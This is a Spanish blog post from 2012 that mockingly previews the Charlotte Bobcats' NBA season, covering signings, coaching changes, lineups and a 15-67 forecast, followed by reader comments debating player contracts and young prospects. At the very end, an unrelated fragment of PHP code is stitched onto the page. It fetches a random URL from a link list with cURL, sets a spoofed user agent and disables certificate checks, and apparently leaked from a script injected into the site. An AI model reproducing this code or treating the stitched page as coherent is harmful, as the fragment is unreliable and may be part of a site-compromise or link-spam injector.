Charlotte Bobcats: Resaca en el purgatorio

14 de October de 2012 por Sancho88
Miran a su alrededor y lo ven todo bastante borroso. No saben donde están. Es lógico. Es de día, la habitación huele a cerrado, y nadie sabe cuántos vodkas se tomaron anoche. En la pizarra de resultados, aparece en rojo chillón un absurdo 7-59 y en la pizarra histórica de la liga, la han liado tan gorda que aparecen como el peor entre los peores. Pero les duele tanto la cabeza que no saben qué es lo que han hecho para estar ahí. Se miran unos a otros, se ven nublos, la cabeza sigue girando a ritmos desconocidos. ¿Qué les está pasando? Todos ellos firmaron un contrato avalado por la mayor leyenda del baloncesto pero ahora la nave ha naufragado y se encuentran absolutamente solos en una isla desierta, sin nada alrededor, más que océano y agua salada. Debe ser el purgatorio, el lugar donde pululan las almas sin destino. Muchos dicen que es peor que el mismo infierno y los Bobcats ya lo han comprobado.

Sin saber muy bien qué es lo que tienen que hacer ahora, el tiempo se echa encima. En 15 días tendrán que volver a la fiesta y ahora todos les señalan como los más borrachos y parias, los Barnie Gumble de esta liga. Difícil papeleta pues, quitarse la etiqueta de ‘farolillo rojo’ para un equipo condenado a repetir de nuevo todos los errores del año pasado de manera minuciosa. Son prácticamente los mismos y si alguno ha cambiado, la diferencia tampoco se va a notar.

Algún pecado muy gordo ha debido cometer el chaval que sorprendió a todos en las finales universitarias junto a Anthony Davis y es que Michael Kidd-Gilchrist rezaba, al igual que todos sus compañeros de promoción, para no ser seleccionado por los linces rojos. Pero su perípato y su destino le llevaron a las profundidades, y el ex alero de los Wildcats tendrá que sacar su mejor baloncesto desde el minuto 1 para reflotar la antigualla anclada en los fondos marinos.

Otros tres jugadores sí saben perfectamente qué han hecho para llegar hasta allí, o, más bien, que no han hecho. Ben Gordon, Brendan Haywood y Ramon Sessions fueron chicos malos la pasada fiesta. Haywood echó más ponche de la cuenta en el pozo sin fondo de la zona de los Mavericks. Sessions pensó que aquella chaqueta de oro y púrpura tan elegante de los Lakers se podía mancillar con pasotismo e incompetencia. Su condena debería ser eterna, pues las mieles de la liga le dejaron llegar hasta los Playoffs cuando un jugador como él no debería pasar jamás del banquillo de un equipo humilde. Así que mezcló ginebra con tónica y acabó uniéndose a la conga de los Bobcats.  Por último, Ben Gordon simplemente deambulaba por la fiesta ofreciendo su manita de 13 millones de dólares al pobre incauto que la quisiera. Y allí apareció, como no, el dueño de todo el despropósito, recordando que hace algunos años muchos dijeron que Gordon podía ser el nuevo Jordan.

Y como el más pecador entre los pecadores se llamaba Silas y no se mortificaba precisamente con un cilicio, como su homónimo en ‘El Código Da Vinci’, el banquillo también ha cambiado de nombre. El ‘papelón’ pasa ahora a manos de Mike Dunlap, un eterno asistente en las ligas universitarias, que aparecía como tercer o cuarto plato tras Jerry Sloan o Brian Shaw, entre otros. Y es que es lógico que nadie quiera ‘cargarse al muerto’ a la espalda. Pesa mucho, genera hernias discales y huele a putrefacto. Desde la renuncia de Larry Brown a finales de 2010, en Charlotte viven inmersos en un bucle infinito que nadie sabe cuándo puede terminar.

No obstante, observando el proyecto como un reto deportivo, nada puede consagrar más a un entrenador como armar desde los desperdicios a un equipo decente de baloncesto. Desde luego, tiene muchísimas tareas pendientes,y yo diría que la primera de ellas y más importante pasa por crear un argumento ofensivo para no volver a hacer el ridículo. Los Bobcats fueron el año pasado el peor equipo anotador, promediando apenas 87 puntos por noche. Maggette tuvo alguna velada inspirada pero aparte de él, dos jugadores sobre pagadísimos como Tyrus Thomas y Desagana Diop, solo se dedicaron a ver la vida pasar mientras su cazo se llenaba a espuertas. La amnistía sobrevuela sobre los cielos de Charlotte. Lo de Diop se soluciona el año que viene, pues termina su contrato esta temporada, pero el amigo Tyrus se postula junto a Biedrins para liderar el sindicato del prestigioso club del ‘Cazo Mix’. El tipo no va a perdonar ni un dólar de los 26 millones que le quedan por cobrar hasta 2015. Vomitivo.

Además, las lesiones se ‘cebaron’ con buena parte del roster, y un jugador como Augustin apenas pudo sumar su talento ofensivo que recayó en las manos de Gerald Henderson, un alero decente tanto en ataque como en defensa que debe volver a liderar a los maltrechos Bobcats un año más.

Junto a él se espera la mejora de tres jugadores jóvenes que también están señalados de por vida por su participación en el desaguisado, pero me temo que no tuvieron ninguna culpa. Me refiero a Byron Mullens, Kemba Walker y Bismarck Biyombo. Dunlap no tiene nada que perder y debería darles el control del equipo desde el primer día. Ellos son los únicos, junto a Henderson y Gilchrist, que pueden poner algo de esperanza para esta temporada y para las venideras. Al menos, intentarán arreglar los desperfectos de un fiestón que les ha salido demasiado caro a estos Bobcats. Dicen que ilusionarse sale barato. Correcto. De hecho, es tan gratuito como poner a parir todo el proyecto ‘Jordaniano’. Así, al menos, puede quedar medianamente claro quién o quiénes son culpables de la resaca y quiénes pueden limpiar la basura de la fiesta, y con ello, también el nombre de una franquicia demasiado menor que para lo único que sirve es para seguir manchando el nombre de Michael Jordan en el nuevo milenio. Y es que Su Majestad está haciendo cosas muy raras desde que le dejó Juanita. Es preferible recordarle en el mítico vídeo del sexto anillo. Ahí terminó su leyenda, y todo lo demás sobraba. Mientras, se supone que tutela un proyecto que no va hacia ninguna parte y que amenaza con volver a ser la comidilla de toda la fiesta. Cuanta falta le hace a Seattle un equipo de baloncesto, y cuan mal repartido está el tema de los dólares en el mundo.

-Mira -susurraba desde un rincón de la fiesta Luke Walton-. Unos tipos que dan más pena que yo.

(Y no le faltaba razón…).

Quinteto ideal (si el muñeco se atreve): Kemba Walker, Gerald Henderson, Michael Kidd-Gilchrist, Bismarck Biyombo, Byron Mullens
Quinteto real (si el títere cumple su misión): Ramon Sessions, Ben Gordon, Michael Kidd- Gilchrist, Tyrus Thomas, Brendan Haywood

6º hombre: Reggie Williams

Altas: Ben Gordon (Detroit Pistons), Brendan Haywood (Dallas Mavericks), Michael Kidd-Gilchrist (Kentucky Wildcats), Ramon Sessions (Los Ángeles Lakers), Jeffery Taylor (Vanderbilt Commodores)

Bajas: Corey Maggette (Detroit Pistons), D.J. Augustin (Indiana Pacers), Derrick Brown (San Antonio Spurs), Eduardo Nájera (retirado), D.J. White (Shangai Sharks, China)

Previsión: 15-67 (En realidad es indiferente. Van a por la bolita de Muhammad)

Comenta

16 comentarios a esta entrada

  1. simon dice:
    #1

    Muy buen analisis sancho pero… un detalle que a mi me mosquea siempre que se dice y cada vez mas, no se por qué… son las franquicias las que firman los contratos no los jugadores… los jugadores las aceptan o no… pero las ofertas las hacen las franquicias.

      Citar

  2. Sancho88 dice:
    #2

    Lo siento Simón, pero yo no puedo evitar mosquearme con gente que cobra auténticas millonadas y ni siquiera cumple su trabajo. Lo dice Molano en el análisis de los Warriors sobre Biedrins. Fue el único que no se presentó a los entrenamientos voluntarios, a mí eso me parece una desconsideración hacia los compañeros y hacia uno mismo, que es un privilegiado por estar entre los 400 mejores jugadores del baloncesto del planeta y ni siquiera tener ganas e ilusión por cumplir decéntemente con su trabajo. Creo que cualquiera de los que estamos aquí si cobrásemos ese dineral al menos tendríamos la decencia de trabajar, vamos, digo yo… Y claro que las franquicias tienen la culpa de firmar esos contratos, pero una vez hecho, creo que al menos deben exigir que esos jugadores no se toquen las gónadas. Mira los Magic con Arenas, menudo papelón… quién iba a decir que un tío que metía 50 puntos por noche durante muchos partidos, de repente se lesionase, tuviera el jaleo de las pistolas (suficiente como para haber tenido derecho los Magic a rescindir su contrato sin pagarle ni un dolar más), y ahora le tengas que pagar 60 millones por su cara bonita… eso es vergonzoso. Creo que en cualquier trabajo, si te despiden se te jode el contrato y te tienen que pagar una indemnización, pero en ningún caso el contrato íntegro. Luego se quejan los jugadores de los convenios y tal, pues la culpa es de muchos de ellos sinceramente. Esa es mi opinión, pero es totalmente respetable la tuya Simón. Saludos y me alegro que te haya gustado el análisis men

      Citar

  3. Viva_Dirk dice:
    #3

    Del análisis, creo que Sessions y Kemba van a coincidir minutos en cancha siendo Walker el titular. Dudo mucho que Tyrus vaya a ser titular, Haywood igual si pero el otro no.

    Solo podemos esperar a ver como evolucionan sus jóvenes, el resto es sabido ya.

      Citar

  4. simon dice:
    #4

    @sancho88 Ya Sancho si en ese punto estamos de acuerdo al 100% lo que quiero decir es que lo de Arenas es mas sangrante por q la culpa es integra del jugador pues si que valía ese contrato ( en principio ), a lo que yo quiero llegar es a que en los casos de gente como Biedrins, Thomas o Diop los culpables no son otros que las franquicias, pues ofrecerle mas de 8 a Thomas mas de 7 a Diop o 9 o 10 a Biedrins… es pegarte un tiro en el pie… son jugadores que nunca han destacado ni han sido profesionales y/o talentosos de verdad… asi q q nadie venga a sorprenderse ahora…

      Citar

  5. simon dice:
    #5

    Por cierto me ha encantado eso de quinteto ideal y quinteto real… totalmente de acuerdo ahi ejeje

      Citar

  6. R1Molano dice:
    #6

    @ Sancho: En todo caso, puntualizo, estuvo entrenando en Santa Barbara con Al Jefferson. El caso de Biedrins es caso especialito total, es mas, yo diría que es un lesionado mental mas que otra cosa. Aunque su caída de rendimiento empezó por lesiones constantes muy jodidas.

    En todo caso, en los Warriors los entrenamientos voluntarios son religión desde hace años, en otras franquicias no. Tampoco ha hecho nada fuera de lo normal en la liga.

    El mismo Al Jefferson comenta que no sabe que es lo que le pasa porque entrenando es una bestia, cerca del jugador que era cuando era una double-double machine y luego jugando es un desastre.

    Tiene un problema mental importantisimo con ir a la linea de tiros libres a sufrir una constante humillación, pero eso aun tiene arreglo, que tiene a Rick Barry de entrenador de tiro.
    Yo creo que simplemente el ya no lo pasa bien en la cancha, se ve el objetivo de los focos, de las burlas y simplemente desconecta. Y mi teoría creo que es bastante seria, es mas, siempre hace unos 5-10 partidos relativamente buenos y luego se viene abajo.

    En todo caso, cuando a Biedrins le dieron sus $54M estaba mas que justificado (no el caso de Tyrus Thomas, precisamente), repasad los números, doble doble, su 62% en FG y su 60% en FT.

    Si tenéis tiempo leeros este articulo, es espectacular:
    http://sportsillustrated.cnn.com/2012/writers/chris_ballard/10/10/andris.biedrins/index.html

      Citar

  7. Denise dice:
    #7

    Sancho me gusta tu intro de las cabezas nubladas y esas metaforas y comparaciones frikis con el Infierno, Hades o como lo llames. Muy bueno lo de Walton. Ya me quedo mas tranquilo, si George Martin se muere antes de publicar el 6º y 7º libro, deberias continuar tu con la saga de “Cancion de Hielo y Fuego”

    Sobre los Bobcats, una basura de equipo pero que al menos apetece ver algunos partidos para seguir al rookie pick 2, a Kemba. a ver si se convierte en un guard en condiciones, y a Biyombo que espero que haga una carrera similar a Ibaka.

    Sobre lo de Seattle…me caen bien los Bobcats…prefiero que sean los Cavs los que se borren del mapa, y los Sonics ocupen su plaza. Esto haría que los Grizzlies jueguen donde deben, en el Este, y que los Thunder fueran a parar a la conferencia con los equipos tejanos mas los Hornets.

    Pronóstico; 20-52, fueriiiisima de playoffs,

      Citar

  8. nba dice:
    #8

    No se, pero estos Bobcats deambularan por la cola de la liga mientras no consigan a alguien como Durant en un draft, por otro lado, como aficionado Laker, veria con buenos ojos que Jordan se liara la manta a la cabeza y consiguiese un trade por Pau, porque despues de ver la ultima derrota de los Lakers, me empiezo a calentar con la actitud de Pau, leñe, parece que necesita un serio correctivo, no se si sera el cansancio de las sesiones de entreno, pero estoy por proponer que sea titular Somogyl.

      Citar

  9. Denise dice:
    #9

    nba:
    como aficionado Laker, veria con buenos ojos que Jordan se liara la mantaa la cabeza y consiguiese un trade por Pau, porque despues de ver la ultima derrota de los Lakers, me empiezo a calentar con la actitud de Pau, leñe, parece que necesita un serio correctivo, no se si sera el cansancio de las sesiones de entreno, pero estoy por proponer que sea titular Somogyl.

    Es muy pronto para estar asustados…es que entonces los Mavs y los Celtics deberian cambiar a medio equipo tras hincar la rodilla en Barcelona y Turquia.

    A los resultados de pretemporada, no hay que darles mayor importancia. Solo son partidos para conocerse y conseguir estar en forma. Ademas,un equipo que aspire a anillo, tiene que estar 100% perfecto a partir de marzo.

    PD: Los numeros de Sacre bastante buenos, por cierto. A ver si al final le quita el puesto a Superman..xD

      Citar

  10. nba dice:
    #10

    Cierto Denise es pretemporada, pues entonces pon a los suplentes 25-30 minutos aunque se pierda de paliza, que sino, ya me diras tu como vas a tener elementos de juicio para descartar o no a un rookie , si solo lo sacas 5 minutos.

      Citar

  11. melo15 dice:
    #11

    Perdon por el offtpic, pero esque acabo de ver el resumen de Kanter en la NBA y me he motivado.
    Hablando de los Bobcats, creo que la sola presencia de Kidd-Gilchrist les dara mas competividad y defensa, y con Walker, Henderson y Mullens mas liberados y con mas responsabilidades creo que lo haran bastante bien.
    Sancho gran analisis pero yo pondria a Ben Gordon de 6hombre haber si reacciona.
    PD: Lo que ha de hacer Charlotte es apostar a muerte por sus jovenes, si Thomas juega 12 minutos que se joda, pero los jovenes es lo unico que tienen y han de hacer lo posible para que salgan lo mejor posible, y la mejor manera es poniendolos a jugar, aunque pierdas todos los partidos, total vas a quedar ultimo.

      Citar

  12. Esteban dice:
    #12

    felicitaciones sancho, muy completo analisis, de lo deportivo del año pasado se puede hablar poco

    igualmente, sineto disentir sutilmente contigo, estos bobcats son malos si, pero mucho mejores que el año pasado y van a pasar las 20 victorias

    una retaguardia con sessions- walker y gordon-henderson, es infinitamente mejor que la del año pasado, y tiene suficiente talento ofensivo para cargar con el equipo, cosa que el año pasado no podian hacer

    gordon es quiza menos jugador que maggette, pero es un anotador y tirador, justo lo que necesitaba este equipo, y sessiones es un pesimo director pero tambien puede anotar,

    con eso mejorar a la dupla maggette y austin, que no podian generar anotaciones, un lugar donde han mejorado

    MKG deberia demostrar lo que se espera de el, quiza no tanto este año, pero es una gran luz de esperanza, un jugador como el no sale todos los dias, con eso basta para ser algo optimista

    y hay que destacar la pretemporada de mullens, mamita, tirando de 3 puntos como si nada, puede que sea el jugador mas mejorado de la liga si sigue a este ritmo

    biyombo debera justificar su pick tan alto y hacer algo mas que meter tapones, pero tiene potencial

    como digo es un equipo malo, pero han salido muy bien parados en comparacion al año pasadom, pues mejoraron sus mayores deficits

    este año tienen jugadores capaces de anotar, no haran grandes cosas pero creo que mejoraran por mucho lo hecho el año pasado

      Citar

  13. Sancho88 dice:
    #13

    Bueno, en realidad, yo las dudas las tengo sobre todo en la dirección. Está claro que el equipo va a anotar bastante más que el año pasado, lo que no tengo tan claro es si Kemba o Sessions pueden defender a alguien en esta liga, y si pueden liderar de verdad en los partidos para conseguir victorias. Puede que estén más cerca de las 20 victorias que de las 15, pero ya te digo que no me parece la cuestión fundamental. En Charlotte yo creo que todos tenemos muchas ganas de ver la evolución de Mullens, como bien citas, Biyombo, Walker, Gilchrist, etc. Y luego, no es un equipo desagradable de ver, al menos será divertido, y porfa, que el nuevo coach deje bien hundidos a Tyrus, Haywood, Diop y demás basura… ojalá

      Citar

  14. GreenPride dice:
    #14

    El equipo que menos me apetece ver la verdad. Si ya estaban mal los fichajes de Haywood y Ben Gordon es traerse más morralla al equipo. Al menos espero que den muchisimos minutos a los jóvenes como Gilchrist, Walker y demás. Un equipo que no ganaría la ACB ni de coña….

      Citar

  15. melo15 dice:
    #15

    @Greenpride Pues nose si la ganarian pero Walker les haria un baile a todos los bases de la NBA y Biyombo de pivot seria bastante imparable y no hablo de MKG que de ala-pivot crearia unas diferencias brutales, yo creo que son mejores que el barça.
    PD: Yo espero mucho de Walker, creo que el año pasaso el equipo le contagio esa actitud pasota y no estaba motivado, no sera una superestrella pero si mejora la direccion cuidadito con el.
    Atencion con Kidd-Gilhrist porque es el nuevo Pippen.

      Citar

  16. Kantonyo dice:
    #16

    Al igual q Melo15, me interesa bastante la progresión de Kemba Walker, tiene mirada de jugón como diría el Gran Montes. Tiene cualidades para ser un grande, sólo hace falta q se lo crea y que sepan gestionar su potencial tanto él cómo los coach de Bobcats. Debe ser el jugador referencia de esta franquicia y crecer en torno a él mientras MKG madura y se asienta a la liga.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>